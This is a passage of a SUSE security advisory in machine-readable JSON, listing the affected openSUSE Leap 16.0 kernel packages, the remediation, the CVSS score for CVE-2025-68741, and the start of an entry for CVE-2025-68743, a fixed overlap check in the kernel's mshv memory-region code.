"references": [
{
"category": "external",
"summary": "CVE-2025-68741",
"url": "https://www.suse.com/security/cve/CVE-2025-68741"
},
{
"category": "external",
"summary": "SUSE Bug 1255703 for CVE-2025-68741",
"url": "https://bugzilla.suse.com/1255703"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68741"
},
{
"cve": "CVE-2025-68743",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68743"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmshv: Fix create memory region overlap check\n\nThe current check is incorrect; it only checks if the beginning or end\nof a region is within an existing region. This doesn\u0027t account for\nuserspace specifying a region that begins before and ends after an\nexisting region.\n\nChange the logic to a range intersection check against gfns and uaddrs\nfor each region.\n\nRemove mshv_partition_region_by_uaddr() as it is no longer used.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
